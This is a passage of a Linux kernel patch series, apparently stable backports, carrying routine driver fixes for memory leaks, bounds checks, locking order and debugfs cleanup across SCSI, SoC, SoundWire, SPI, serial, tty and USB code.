++	bitmap_free(mrioc->evtack_cmds_bitmap);
+ 	mrioc->evtack_cmds_bitmap = NULL;
+ 
+-	kfree(mrioc->chain_bitmap);
++	bitmap_free(mrioc->chain_bitmap);
+ 	mrioc->chain_bitmap = NULL;
+ 
+ 	kfree(mrioc->transport_cmds.reply);
+@@ -4887,9 +4873,10 @@ int mpi3mr_soft_reset_handler(struct mpi3mr_ioc *mrioc,
+ 
+ 	mpi3mr_flush_delayed_cmd_lists(mrioc);
+ 	mpi3mr_flush_drv_cmds(mrioc);
+-	memset(mrioc->devrem_bitmap, 0, mrioc->devrem_bitmap_sz);
+-	memset(mrioc->removepend_bitmap, 0, mrioc->dev_handle_bitmap_sz);
+-	memset(mrioc->evtack_cmds_bitmap, 0, mrioc->evtack_cmds_bitmap_sz);
++	bitmap_clear(mrioc->devrem_bitmap, 0, MPI3MR_NUM_DEVRMCMD);
++	bitmap_clear(mrioc->removepend_bitmap, 0,
++		     mrioc->dev_handle_bitmap_bits);
++	bitmap_clear(mrioc->evtack_cmds_bitmap, 0, MPI3MR_NUM_EVTACKCMD);
+ 	mpi3mr_flush_host_io(mrioc);
+ 	mpi3mr_cleanup_fwevt_list(mrioc);
+ 	mpi3mr_invalidate_devhandles(mrioc);
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 3fc897336b5e0..3b61815979dab 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -1280,7 +1280,7 @@ void mpi3mr_sas_host_add(struct mpi3mr_ioc *mrioc)
+ 
+ 	if (mrioc->sas_hba.enclosure_handle) {
+ 		if (!(mpi3mr_cfg_get_enclosure_pg0(mrioc, &ioc_status,
+-		    &encl_pg0, sizeof(dev_pg0),
++		    &encl_pg0, sizeof(encl_pg0),
+ 		    MPI3_ENCLOS_PGAD_FORM_HANDLE,
+ 		    mrioc->sas_hba.enclosure_handle)) &&
+ 		    (ioc_status == MPI3_IOCSTATUS_SUCCESS))
+diff --git a/drivers/soc/mediatek/mt8186-pm-domains.h b/drivers/soc/mediatek/mt8186-pm-domains.h
+index 108af61854a38..fce86f79c5055 100644
+--- a/drivers/soc/mediatek/mt8186-pm-domains.h
++++ b/drivers/soc/mediatek/mt8186-pm-domains.h
+@@ -304,7 +304,6 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 		.ctl_offs = 0x9FC,
+ 		.pwr_sta_offs = 0x16C,
+ 		.pwr_sta2nd_offs = 0x170,
+-		.caps = MTK_SCPD_KEEP_DEFAULT_OFF,
+ 	},
+ 	[MT8186_POWER_DOMAIN_ADSP_INFRA] = {
+ 		.name = "adsp_infra",
+@@ -312,7 +311,6 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 		.ctl_offs = 0x9F8,
+ 		.pwr_sta_offs = 0x16C,
+ 		.pwr_sta2nd_offs = 0x170,
+-		.caps = MTK_SCPD_KEEP_DEFAULT_OFF,
+ 	},
+ 	[MT8186_POWER_DOMAIN_ADSP_TOP] = {
+ 		.name = "adsp_top",
+@@ -332,7 +330,7 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 				MT8186_TOP_AXI_PROT_EN_3_CLR,
+ 				MT8186_TOP_AXI_PROT_EN_3_STA),
+ 		},
+-		.caps = MTK_SCPD_SRAM_ISO | MTK_SCPD_KEEP_DEFAULT_OFF | MTK_SCPD_ACTIVE_WAKEUP,
++		.caps = MTK_SCPD_SRAM_ISO | MTK_SCPD_ACTIVE_WAKEUP,
+ 	},
+ };
+ 
+diff --git a/drivers/soc/mediatek/mtk-svs.c b/drivers/soc/mediatek/mtk-svs.c
+index 0469c9dfeb04e..00526fd37d7b8 100644
+--- a/drivers/soc/mediatek/mtk-svs.c
++++ b/drivers/soc/mediatek/mtk-svs.c
+@@ -1324,7 +1324,7 @@ static int svs_init01(struct svs_platform *svsp)
+ 				svsb->pm_runtime_enabled_count++;
+ 			}
+ 
+-			ret = pm_runtime_get_sync(svsb->opp_dev);
++			ret = pm_runtime_resume_and_get(svsb->opp_dev);
+ 			if (ret < 0) {
+ 				dev_err(svsb->dev, "mtcmos on fail: %d\n", ret);
+ 				goto svs_init01_resume_cpuidle;
+@@ -1461,6 +1461,7 @@ static int svs_init02(struct svs_platform *svsp)
+ {
+ 	struct svs_bank *svsb;
+ 	unsigned long flags, time_left;
++	int ret;
+ 	u32 idx;
+ 
+ 	for (idx = 0; idx < svsp->bank_max; idx++) {
+@@ -1479,7 +1480,8 @@ static int svs_init02(struct svs_platform *svsp)
+ 							msecs_to_jiffies(5000));
+ 		if (!time_left) {
+ 			dev_err(svsb->dev, "init02 completion timeout\n");
+-			return -EBUSY;
++			ret = -EBUSY;
++			goto out_of_init02;
+ 		}
+ 	}
+ 
+@@ -1497,12 +1499,30 @@ static int svs_init02(struct svs_platform *svsp)
+ 		if (svsb->type == SVSB_HIGH || svsb->type == SVSB_LOW) {
+ 			if (svs_sync_bank_volts_from_opp(svsb)) {
+ 				dev_err(svsb->dev, "sync volt fail\n");
+-				return -EPERM;
++				ret = -EPERM;
++				goto out_of_init02;
+ 			}
+ 		}
+ 	}
+ 
+ 	return 0;
++
++out_of_init02:
++	for (idx = 0; idx < svsp->bank_max; idx++) {
++		svsb = &svsp->banks[idx];
++
++		spin_lock_irqsave(&svs_lock, flags);
++		svsp->pbank = svsb;
++		svs_switch_bank(svsp);
++		svs_writel_relaxed(svsp, SVSB_PTPEN_OFF, SVSEN);
++		svs_writel_relaxed(svsp, SVSB_INTSTS_VAL_CLEAN, INTSTS);
++		spin_unlock_irqrestore(&svs_lock, flags);
++
++		svsb->phase = SVSB_PHASE_ERROR;
++		svs_adjust_pm_opp_volts(svsb);
++	}
++
++	return ret;
+ }
+ 
+ static void svs_mon_mode(struct svs_platform *svsp)
+@@ -1594,12 +1614,16 @@ static int svs_resume(struct device *dev)
+ 
+ 	ret = svs_init02(svsp);
+ 	if (ret)
+-		goto out_of_resume;
++		goto svs_resume_reset_assert;
+ 
+ 	svs_mon_mode(svsp);
+ 
+ 	return 0;
+ 
++svs_resume_reset_assert:
++	dev_err(svsp->dev, "assert reset: %d\n",
++		reset_control_assert(svsp->rst));
++
+ out_of_resume:
+ 	clk_disable_unprepare(svsp->main_clk);
+ 	return ret;
+@@ -2385,14 +2409,6 @@ static int svs_probe(struct platform_device *pdev)
+ 		goto svs_probe_free_resource;
+ 	}
+ 
+-	ret = devm_request_threaded_irq(svsp->dev, svsp_irq, NULL, svs_isr,
+-					IRQF_ONESHOT, svsp->name, svsp);
+-	if (ret) {
+-		dev_err(svsp->dev, "register irq(%d) failed: %d\n",
+-			svsp_irq, ret);
+-		goto svs_probe_free_resource;
+-	}
+-
+ 	svsp->main_clk = devm_clk_get(svsp->dev, "main");
+ 	if (IS_ERR(svsp->main_clk)) {
+ 		dev_err(svsp->dev, "failed to get clock: %ld\n",
+@@ -2414,6 +2430,14 @@ static int svs_probe(struct platform_device *pdev)
+ 		goto svs_probe_clk_disable;
+ 	}
+ 
++	ret = devm_request_threaded_irq(svsp->dev, svsp_irq, NULL, svs_isr,
++					IRQF_ONESHOT, svsp->name, svsp);
++	if (ret) {
++		dev_err(svsp->dev, "register irq(%d) failed: %d\n",
++			svsp_irq, ret);
++		goto svs_probe_iounmap;
++	}
++
+ 	ret = svs_start(svsp);
+ 	if (ret) {
+ 		dev_err(svsp->dev, "svs start fail: %d\n", ret);
+diff --git a/drivers/soc/qcom/qcom_stats.c b/drivers/soc/qcom/qcom_stats.c
+index 121ea409fafcd..b252bedf0cf10 100644
+--- a/drivers/soc/qcom/qcom_stats.c
++++ b/drivers/soc/qcom/qcom_stats.c
+@@ -92,7 +92,7 @@ static int qcom_subsystem_sleep_stats_show(struct seq_file *s, void *unused)
+ 	/* Items are allocated lazily, so lookup pointer each time */
+ 	stat = qcom_smem_get(subsystem->pid, subsystem->smem_item, NULL);
+ 	if (IS_ERR(stat))
+-		return -EIO;
++		return 0;
+ 
+ 	qcom_print_stats(s, stat);
+ 
+@@ -170,20 +170,14 @@ static void qcom_create_soc_sleep_stat_files(struct dentry *root, void __iomem *
+ static void qcom_create_subsystem_stat_files(struct dentry *root,
+ 					     const struct stats_config *config)
+ {
+-	const struct sleep_stats *stat;
+ 	int i;
+ 
+ 	if (!config->subsystem_stats_in_smem)
+ 		return;
+ 
+-	for (i = 0; i < ARRAY_SIZE(subsystems); i++) {
+-		stat = qcom_smem_get(subsystems[i].pid, subsystems[i].smem_item, NULL);
+-		if (IS_ERR(stat))
+-			continue;
+-
++	for (i = 0; i < ARRAY_SIZE(subsystems); i++)
+ 		debugfs_create_file(subsystems[i].name, 0400, root, (void *)&subsystems[i],
+ 				    &qcom_subsystem_sleep_stats_fops);
+-	}
+ }
+ 
+ static int qcom_stats_probe(struct platform_device *pdev)
+diff --git a/drivers/soc/xilinx/xlnx_event_manager.c b/drivers/soc/xilinx/xlnx_event_manager.c
+index 2de082765befa..c76381899ef49 100644
+--- a/drivers/soc/xilinx/xlnx_event_manager.c
++++ b/drivers/soc/xilinx/xlnx_event_manager.c
+@@ -116,8 +116,10 @@ static int xlnx_add_cb_for_notify_event(const u32 node_id, const u32 event, cons
+ 		INIT_LIST_HEAD(&eve_data->cb_list_head);
+ 
+ 		cb_data = kmalloc(sizeof(*cb_data), GFP_KERNEL);
+-		if (!cb_data)
++		if (!cb_data) {
++			kfree(eve_data);
+ 			return -ENOMEM;
++		}
+ 		cb_data->eve_cb = cb_fun;
+ 		cb_data->agent_data = data;
+ 
+diff --git a/drivers/soundwire/bus_type.c b/drivers/soundwire/bus_type.c
+index 04b3529f89293..963498db0fd22 100644
+--- a/drivers/soundwire/bus_type.c
++++ b/drivers/soundwire/bus_type.c
+@@ -105,20 +105,19 @@ static int sdw_drv_probe(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&slave->sdw_dev_lock);
+-
+ 	ret = drv->probe(slave, id);
+ 	if (ret) {
+ 		name = drv->name;
+ 		if (!name)
+ 			name = drv->driver.name;
+-		mutex_unlock(&slave->sdw_dev_lock);
+ 
+ 		dev_err(dev, "Probe of %s failed: %d\n", name, ret);
+ 		dev_pm_domain_detach(dev, false);
+ 		return ret;
+ 	}
+ 
++	mutex_lock(&slave->sdw_dev_lock);
++
+ 	/* device is probed so let's read the properties now */
+ 	if (drv->ops && drv->ops->read_prop)
+ 		drv->ops->read_prop(slave);
+@@ -167,14 +166,12 @@ static int sdw_drv_remove(struct device *dev)
+ 	int ret = 0;
+ 
+ 	mutex_lock(&slave->sdw_dev_lock);
+-
+ 	slave->probed = false;
++	mutex_unlock(&slave->sdw_dev_lock);
+ 
+ 	if (drv->remove)
+ 		ret = drv->remove(slave);
+ 
+-	mutex_unlock(&slave->sdw_dev_lock);
+-
+ 	dev_pm_domain_detach(dev, false);
+ 
+ 	return ret;
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index b65cdf2a7593e..e7da7d7b213fb 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -555,6 +555,29 @@ cdns_fill_msg_resp(struct sdw_cdns *cdns,
+ 	return SDW_CMD_OK;
+ }
+ 
++static void cdns_read_response(struct sdw_cdns *cdns)
++{
++	u32 num_resp, cmd_base;
++	int i;
++
++	/* RX_FIFO_AVAIL can be 2 entries more than the FIFO size */
++	BUILD_BUG_ON(ARRAY_SIZE(cdns->response_buf) < CDNS_MCP_CMD_LEN + 2);
++
++	num_resp = cdns_readl(cdns, CDNS_MCP_FIFOSTAT);
++	num_resp &= CDNS_MCP_RX_FIFO_AVAIL;
++	if (num_resp > ARRAY_SIZE(cdns->response_buf)) {
++		dev_warn(cdns->dev, "RX AVAIL %d too long\n", num_resp);
++		num_resp = ARRAY_SIZE(cdns->response_buf);
++	}
++
++	cmd_base = CDNS_MCP_CMD_BASE;
++
++	for (i = 0; i < num_resp; i++) {
++		cdns->response_buf[i] = cdns_readl(cdns, cmd_base);
++		cmd_base += CDNS_MCP_CMD_WORD_LEN;
++	}
++}
++
+ static enum sdw_command_response
+ _cdns_xfer_msg(struct sdw_cdns *cdns, struct sdw_msg *msg, int cmd,
+ 	       int offset, int count, bool defer)
+@@ -596,6 +619,10 @@ _cdns_xfer_msg(struct sdw_cdns *cdns, struct sdw_msg *msg, int cmd,
+ 		dev_err(cdns->dev, "IO transfer timed out, cmd %d device %d addr %x len %d\n",
+ 			cmd, msg->dev_num, msg->addr, msg->len);
+ 		msg->len = 0;
++
++		/* Drain anything in the RX_FIFO */
++		cdns_read_response(cdns);
++
+ 		return SDW_CMD_TIMEOUT;
+ 	}
+ 
+@@ -769,22 +796,6 @@ EXPORT_SYMBOL(cdns_read_ping_status);
+  * IRQ handling
+  */
+ 
+-static void cdns_read_response(struct sdw_cdns *cdns)
+-{
+-	u32 num_resp, cmd_base;
+-	int i;
+-
+-	num_resp = cdns_readl(cdns, CDNS_MCP_FIFOSTAT);
+-	num_resp &= CDNS_MCP_RX_FIFO_AVAIL;
+-
+-	cmd_base = CDNS_MCP_CMD_BASE;
+-
+-	for (i = 0; i < num_resp; i++) {
+-		cdns->response_buf[i] = cdns_readl(cdns, cmd_base);
+-		cmd_base += CDNS_MCP_CMD_WORD_LEN;
+-	}
+-}
+-
+ static int cdns_update_slave_status(struct sdw_cdns *cdns,
+ 				    u64 slave_intstat)
+ {
+diff --git a/drivers/soundwire/cadence_master.h b/drivers/soundwire/cadence_master.h
+index ca9e805bab88f..51e6ecc027cbc 100644
+--- a/drivers/soundwire/cadence_master.h
++++ b/drivers/soundwire/cadence_master.h
+@@ -8,6 +8,12 @@
+ #define SDW_CADENCE_GSYNC_KHZ		4 /* 4 kHz */
+ #define SDW_CADENCE_GSYNC_HZ		(SDW_CADENCE_GSYNC_KHZ * 1000)
+ 
++/*
++ * The Cadence IP supports up to 32 entries in the FIFO, though implementations
++ * can configure the IP to have a smaller FIFO.
++ */
++#define CDNS_MCP_IP_MAX_CMD_LEN		32
++
+ /**
+  * struct sdw_cdns_pdi: PDI (Physical Data Interface) instance
+  *
+@@ -114,7 +120,12 @@ struct sdw_cdns {
+ 	struct sdw_bus bus;
+ 	unsigned int instance;
+ 
+-	u32 response_buf[0x80];
++	/*
++	 * The datasheet says the RX FIFO AVAIL can be 2 entries more
++	 * than the FIFO capacity, so allow for this.
++	 */
++	u32 response_buf[CDNS_MCP_IP_MAX_CMD_LEN + 2];
++
+ 	struct completion tx_complete;
+ 	struct sdw_defer *defer;
+ 
+diff --git a/drivers/spi/spi-tegra210-quad.c b/drivers/spi/spi-tegra210-quad.c
+index 9f356612ba7e5..06c54d49076ae 100644
+--- a/drivers/spi/spi-tegra210-quad.c
++++ b/drivers/spi/spi-tegra210-quad.c
+@@ -1156,6 +1156,10 @@ static int tegra_qspi_combined_seq_xfer(struct tegra_qspi *tqspi,
+ 				ret = -EIO;
+ 				goto exit;
+ 			}
++			if (!xfer->cs_change) {
++				tegra_qspi_transfer_end(spi);
++				spi_transfer_delay_exec(xfer);
++			}
+ 			break;
+ 		default:
+ 			ret = -EINVAL;
+@@ -1164,14 +1168,14 @@ static int tegra_qspi_combined_seq_xfer(struct tegra_qspi *tqspi,
+ 		msg->actual_length += xfer->len;
+ 		transfer_phase++;
+ 	}
+-	if (!xfer->cs_change) {
+-		tegra_qspi_transfer_end(spi);
+-		spi_transfer_delay_exec(xfer);
+-	}
+ 	ret = 0;
+ 
+ exit:
+ 	msg->status = ret;
++	if (ret < 0) {
++		tegra_qspi_transfer_end(spi);
++		spi_transfer_delay_exec(xfer);
++	}
+ 
+ 	return ret;
+ }
+@@ -1297,7 +1301,7 @@ static bool tegra_qspi_validate_cmb_seq(struct tegra_qspi *tqspi,
+ 	if (xfer->len > 4 || xfer->len < 3)
+ 		return false;
+ 	xfer = list_next_entry(xfer, transfer_list);
+-	if (!tqspi->soc_data->has_dma || xfer->len > (QSPI_FIFO_DEPTH << 2))
++	if (!tqspi->soc_data->has_dma && xfer->len > (QSPI_FIFO_DEPTH << 2))
+ 		return false;
+ 
+ 	return true;
+diff --git a/drivers/staging/emxx_udc/emxx_udc.c b/drivers/staging/emxx_udc/emxx_udc.c
+index b6abd3770e81c..edd20a03f7a26 100644
+--- a/drivers/staging/emxx_udc/emxx_udc.c
++++ b/drivers/staging/emxx_udc/emxx_udc.c
+@@ -2590,10 +2590,15 @@ static int nbu2ss_ep_queue(struct usb_ep *_ep,
+ 		req->unaligned = false;
+ 
+ 	if (req->unaligned) {
+-		if (!ep->virt_buf)
++		if (!ep->virt_buf) {
+ 			ep->virt_buf = dma_alloc_coherent(udc->dev, PAGE_SIZE,
+ 							  &ep->phys_buf,
+ 							  GFP_ATOMIC | GFP_DMA);
++			if (!ep->virt_buf) {
++				spin_unlock_irqrestore(&udc->lock, flags);
++				return -ENOMEM;
++			}
++		}
+ 		if (ep->epnum > 0)  {
+ 			if (ep->direct == USB_DIR_IN)
+ 				memcpy(ep->virt_buf, req->req.buf,
+diff --git a/drivers/staging/pi433/pi433_if.c b/drivers/staging/pi433/pi433_if.c
+index d4e06a3929f3d..b59f6a4cb611a 100644
+--- a/drivers/staging/pi433/pi433_if.c
++++ b/drivers/staging/pi433/pi433_if.c
+@@ -55,6 +55,7 @@
+ static dev_t pi433_dev;
+ static DEFINE_IDR(pi433_idr);
+ static DEFINE_MUTEX(minor_lock); /* Protect idr accesses */
++static struct dentry *root_dir;	/* debugfs root directory for the driver */
+ 
+ static struct class *pi433_class; /* mainly for udev to create /dev/pi433 */
+ 
+@@ -1306,8 +1307,7 @@ static int pi433_probe(struct spi_device *spi)
+ 	/* spi setup */
+ 	spi_set_drvdata(spi, device);
+ 
+-	entry = debugfs_create_dir(dev_name(device->dev),
+-				   debugfs_lookup(KBUILD_MODNAME, NULL));
++	entry = debugfs_create_dir(dev_name(device->dev), root_dir);
+ 	debugfs_create_file("regs", 0400, entry, device, &pi433_debugfs_regs_fops);
+ 
+ 	return 0;
+@@ -1333,9 +1333,8 @@ RX_failed:
+ static void pi433_remove(struct spi_device *spi)
+ {
+ 	struct pi433_device	*device = spi_get_drvdata(spi);
+-	struct dentry *mod_entry = debugfs_lookup(KBUILD_MODNAME, NULL);
+ 
+-	debugfs_remove(debugfs_lookup(dev_name(device->dev), mod_entry));
++	debugfs_lookup_and_remove(dev_name(device->dev), root_dir);
+ 
+ 	/* free GPIOs */
+ 	free_gpio(device);
+@@ -1408,7 +1407,7 @@ static int __init pi433_init(void)
+ 		return PTR_ERR(pi433_class);
+ 	}
+ 
+-	debugfs_create_dir(KBUILD_MODNAME, NULL);
++	root_dir = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 
+ 	status = spi_register_driver(&pi433_spi_driver);
+ 	if (status < 0) {
+@@ -1427,7 +1426,7 @@ static void __exit pi433_exit(void)
+ 	spi_unregister_driver(&pi433_spi_driver);
+ 	class_destroy(pi433_class);
+ 	unregister_chrdev(MAJOR(pi433_dev), pi433_spi_driver.driver.name);
+-	debugfs_remove_recursive(debugfs_lookup(KBUILD_MODNAME, NULL));
++	debugfs_remove(root_dir);
+ }
+ module_exit(pi433_exit);
+ 
+diff --git a/drivers/thermal/intel/Kconfig b/drivers/thermal/intel/Kconfig
+index f0c8456792509..e3cfad10d5dd4 100644
+--- a/drivers/thermal/intel/Kconfig
++++ b/drivers/thermal/intel/Kconfig
+@@ -64,7 +64,8 @@ endmenu
+ 
+ config INTEL_BXT_PMIC_THERMAL
+ 	tristate "Intel Broxton PMIC thermal driver"
+-	depends on X86 && INTEL_SOC_PMIC_BXTWC && REGMAP
++	depends on X86 && INTEL_SOC_PMIC_BXTWC
++	select REGMAP
+ 	help
+ 	  Select this driver for Intel Broxton PMIC with ADC channels monitoring
+ 	  system temperature measurements and alerts.
+diff --git a/drivers/thermal/intel/intel_quark_dts_thermal.c b/drivers/thermal/intel/intel_quark_dts_thermal.c
+index 3eafc6b0e6c30..b43fbd5eaa6b4 100644
+--- a/drivers/thermal/intel/intel_quark_dts_thermal.c
++++ b/drivers/thermal/intel/intel_quark_dts_thermal.c
+@@ -415,22 +415,14 @@ MODULE_DEVICE_TABLE(x86cpu, qrk_thermal_ids);
+ 
+ static int __init intel_quark_thermal_init(void)
+ {
+-	int err = 0;
+-
+ 	if (!x86_match_cpu(qrk_thermal_ids) || !iosf_mbi_available())
+ 		return -ENODEV;
+ 
+ 	soc_dts = alloc_soc_dts();
+-	if (IS_ERR(soc_dts)) {
+-		err = PTR_ERR(soc_dts);
+-		goto err_free;
+-	}
++	if (IS_ERR(soc_dts))
++		return PTR_ERR(soc_dts);
+ 
+ 	return 0;
+-
+-err_free:
+-	free_soc_dts(soc_dts);
+-	return err;
+ }
+ 
+ static void __exit intel_quark_thermal_exit(void)
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 13a6cd0116a13..f9d667ce1619e 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1468,12 +1468,32 @@ static void lpuart_break_ctl(struct uart_port *port, int break_state)
+ 
+ static void lpuart32_break_ctl(struct uart_port *port, int break_state)
+ {
+-	unsigned long temp;
++	unsigned long temp, modem;
++	struct tty_struct *tty;
++	unsigned int cflag = 0;
++
++	tty = tty_port_tty_get(&port->state->port);
++	if (tty) {
++		cflag = tty->termios.c_cflag;
++		tty_kref_put(tty);
++	}
+ 
+ 	temp = lpuart32_read(port, UARTCTRL) & ~UARTCTRL_SBK;
++	modem = lpuart32_read(port, UARTMODIR);
+ 
+-	if (break_state != 0)
++	if (break_state != 0) {
+ 		temp |= UARTCTRL_SBK;
++		/*
++		 * LPUART CTS has higher priority than SBK, need to disable CTS before
++		 * asserting SBK to avoid any interference if flow control is enabled.
++		 */
++		if (cflag & CRTSCTS && modem & UARTMODIR_TXCTSE)
++			lpuart32_write(port, modem & ~UARTMODIR_TXCTSE, UARTMODIR);
++	} else {
++		/* Re-enable the CTS when break off. */
++		if (cflag & CRTSCTS && !(modem & UARTMODIR_TXCTSE))
++			lpuart32_write(port, modem | UARTMODIR_TXCTSE, UARTMODIR);
++	}
+ 
+ 	lpuart32_write(port, temp, UARTCTRL);
+ }
+diff --git a/drivers/tty/serial/pch_uart.c b/drivers/tty/serial/pch_uart.c
+index 83f35b7b0897c..abff1c6470f6a 100644
+--- a/drivers/tty/serial/pch_uart.c
++++ b/drivers/tty/serial/pch_uart.c
+@@ -1779,7 +1779,7 @@ static void pch_uart_exit_port(struct eg20t_port *priv)
+ 	char name[32];
+ 
+ 	snprintf(name, sizeof(name), "uart%d_regs", priv->port.line);
+-	debugfs_remove(debugfs_lookup(name, NULL));
++	debugfs_lookup_and_remove(name, NULL);
+ 	uart_remove_one_port(&pch_uart_driver, &priv->port);
+ 	free_page((unsigned long)priv->rxbuf.buf);
+ }
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index 524921360ca78..93cf5f7888172 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -1426,25 +1426,6 @@ static int sc16is7xx_probe(struct device *dev,
+ 	}
+ 	sched_set_fifo(s->kworker_task);
+ 
+-#ifdef CONFIG_GPIOLIB
+-	if (devtype->nr_gpio) {
+-		/* Setup GPIO cotroller */
+-		s->gpio.owner		 = THIS_MODULE;
+-		s->gpio.parent		 = dev;
+-		s->gpio.label		 = dev_name(dev);
+-		s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
+-		s->gpio.get		 = sc16is7xx_gpio_get;
+-		s->gpio.direction_output = sc16is7xx_gpio_direction_output;
+-		s->gpio.set		 = sc16is7xx_gpio_set;
+-		s->gpio.base		 = -1;
+-		s->gpio.ngpio		 = devtype->nr_gpio;
+-		s->gpio.can_sleep	 = 1;
+-		ret = gpiochip_add_data(&s->gpio, s);
+-		if (ret)
+-			goto out_thread;
+-	}
+-#endif
+-
+ 	/* reset device, purging any pending irq / data */
+ 	regmap_write(s->regmap, SC16IS7XX_IOCONTROL_REG << SC16IS7XX_REG_SHIFT,
+ 			SC16IS7XX_IOCONTROL_SRESET_BIT);
+@@ -1521,6 +1502,25 @@ static int sc16is7xx_probe(struct device *dev,
+ 				s->p[u].irda_mode = true;
+ 	}
+ 
++#ifdef CONFIG_GPIOLIB
++	if (devtype->nr_gpio) {
++		/* Setup GPIO cotroller */
++		s->gpio.owner		 = THIS_MODULE;
++		s->gpio.parent		 = dev;
++		s->gpio.label		 = dev_name(dev);
++		s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
++		s->gpio.get		 = sc16is7xx_gpio_get;
++		s->gpio.direction_output = sc16is7xx_gpio_direction_output;
++		s->gpio.set		 = sc16is7xx_gpio_set;
++		s->gpio.base		 = -1;
++		s->gpio.ngpio		 = devtype->nr_gpio;
++		s->gpio.can_sleep	 = 1;
++		ret = gpiochip_add_data(&s->gpio, s);
++		if (ret)
++			goto out_thread;
++	}
++#endif
++
+ 	/*
+ 	 * Setup interrupt. We first try to acquire the IRQ line as level IRQ.
+ 	 * If that succeeds, we can allow sharing the interrupt as well.
+@@ -1540,18 +1540,19 @@ static int sc16is7xx_probe(struct device *dev,
+ 	if (!ret)
+ 		return 0;
+ 
+-out_ports:
+-	for (i--; i >= 0; i--) {
+-		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+-		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
+-	}
+-
+ #ifdef CONFIG_GPIOLIB
+ 	if (devtype->nr_gpio)
+ 		gpiochip_remove(&s->gpio);
+ 
+ out_thread:
+ #endif
++
++out_ports:
++	for (i--; i >= 0; i--) {
++		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
++		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
++	}
++
+ 	kthread_stop(s->kworker_task);
+ 
+ out_clk:
+diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
+index de06c3c2ff70a..1ac6784ea1f92 100644
+--- a/drivers/tty/tty_io.c
++++ b/drivers/tty/tty_io.c
+@@ -1224,14 +1224,16 @@ static struct tty_struct *tty_driver_lookup_tty(struct tty_driver *driver,
+ {
+ 	struct tty_struct *tty;
+ 
+-	if (driver->ops->lookup)
++	if (driver->ops->lookup) {
+ 		if (!file)
+ 			tty = ERR_PTR(-EIO);
+ 		else
+ 			tty = driver->ops->lookup(driver, file, idx);
+-	else
++	} else {
++		if (idx >= driver->num)
++			return ERR_PTR(-EINVAL);
+ 		tty = driver->ttys[idx];
+-
++	}
+ 	if (!IS_ERR(tty))
+ 		tty_kref_get(tty);
+ 	return tty;
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index 71e091f879f0e..1dc07f9214d57 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -415,10 +415,8 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 		 */
+ 		size = vcs_size(vc, attr, uni_mode);
+ 		if (size < 0) {
+-			if (read)
+-				break;
+ 			ret = size;
+-			goto unlock_out;
++			break;
+ 		}
+ 		if (pos >= size)
+ 			break;
+diff --git a/drivers/usb/chipidea/debug.c b/drivers/usb/chipidea/debug.c
+index faf6b078b6c44..bbc610e5bd69c 100644
+--- a/drivers/usb/chipidea/debug.c
++++ b/drivers/usb/chipidea/debug.c
+@@ -364,5 +364,5 @@ void dbg_create_files(struct ci_hdrc *ci)
+  */
+ void dbg_remove_files(struct ci_hdrc *ci)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(ci->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(ci->dev), usb_debug_root);
+ }
+diff --git a/drivers/usb/common/ulpi.c b/drivers/usb/common/ulpi.c
+index d7c8461976ce0..38703781ee2d1 100644
+--- a/drivers/usb/common/ulpi.c
++++ b/drivers/usb/common/ulpi.c
+@@ -271,7 +271,7 @@ static int ulpi_regs_show(struct seq_file *seq, void *data)
+ }
+ DEFINE_SHOW_ATTRIBUTE(ulpi_regs);
+ 
+-#define ULPI_ROOT debugfs_lookup(KBUILD_MODNAME, NULL)
++static struct dentry *ulpi_root;
+ 
+ static int ulpi_register(struct device *dev, struct ulpi *ulpi)
+ {
+@@ -301,7 +301,7 @@ static int ulpi_register(struct device *dev, struct ulpi *ulpi)
+ 		return ret;
+ 	}
+ 
+-	root = debugfs_create_dir(dev_name(dev), ULPI_ROOT);
++	root = debugfs_create_dir(dev_name(dev), ulpi_root);
+ 	debugfs_create_file("regs", 0444, root, ulpi, &ulpi_regs_fops);
+ 
+ 	dev_dbg(&ulpi->dev, "registered ULPI PHY: vendor %04x, product %04x\n",
+@@ -349,8 +349,7 @@ EXPORT_SYMBOL_GPL(ulpi_register_interface);
+  */
+ void ulpi_unregister_interface(struct ulpi *ulpi)
+ {
+-	debugfs_remove_recursive(debugfs_lookup(dev_name(&ulpi->dev),
+-						ULPI_ROOT));
++	debugfs_lookup_and_remove(dev_name(&ulpi->dev), ulpi_root);
+ 	device_unregister(&ulpi->dev);
+ }
+ EXPORT_SYMBOL_GPL(ulpi_unregister_interface);
+@@ -360,12 +359,11 @@ EXPORT_SYMBOL_GPL(ulpi_unregister_interface);
+ static int __init ulpi_init(void)
+ {
+ 	int ret;
+-	struct dentry *root;
+ 
+-	root = debugfs_create_dir(KBUILD_MODNAME, NULL);
++	ulpi_root = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 	ret = bus_register(&ulpi_bus);
+ 	if (ret)
